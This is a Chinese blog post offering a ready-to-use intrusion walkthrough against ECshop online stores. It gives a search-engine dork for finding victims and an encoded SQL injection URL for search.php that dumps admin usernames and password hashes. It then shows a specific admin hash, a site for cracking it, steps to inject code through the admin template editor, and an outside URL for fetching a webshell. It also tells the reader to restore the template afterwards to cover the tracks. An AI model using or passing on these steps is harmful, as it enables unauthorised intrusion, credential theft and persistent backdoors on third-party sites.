首页 » 未分类 » 阅读文章
ECshop搜索SQL注入问题
无聊阿,直接丢个ecshop通杀所有版本读取管理员帐号出来给大家去玩玩~~~
google搜索:powered by ecshop malaysia
然后就会出现一堆了,然后。。。
入侵步骤:
2.网址栏输入
- search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
复制代码
3.管理员帐号与密码出来了,如图:用户名是 admin, md5加密后的密码是 ff34aafa01405a2277ca6d90eaa72c94
4.下来我们使用 http://www.c0llision.net/webcrack.php 来破解md5加密后的密码
5.密码破解出来后,我们就可以使用该用户名以及密码登录ecshop后台了,ecshop后台目录是 http://目标/admin
6. 进入后台后,电击左边menu里的 模板管理>库项目管理 , 然后选择 myship.lbi
7. 然后把以下文件的代码复制进去
https://sites.google.com/site/wming79/shell.php?attredirects=0&d=1
8. 访问 http://目标/myship.php, 登录密码: 12345
9. 登录后,点击images或者data目录
10. 上传我们的后门webshell: shell.php
11. 上传成功后,尝试访问后门,http://目标/images/shell.php 又或者 http://目标/的data/shell.php
12. 下来记得要还原我们修改的模板文件,点击 还原到上一次修改, 然后点击确定
13. 之后就自由发挥吧
评论 共0条 (RSS 2.0) 发表评论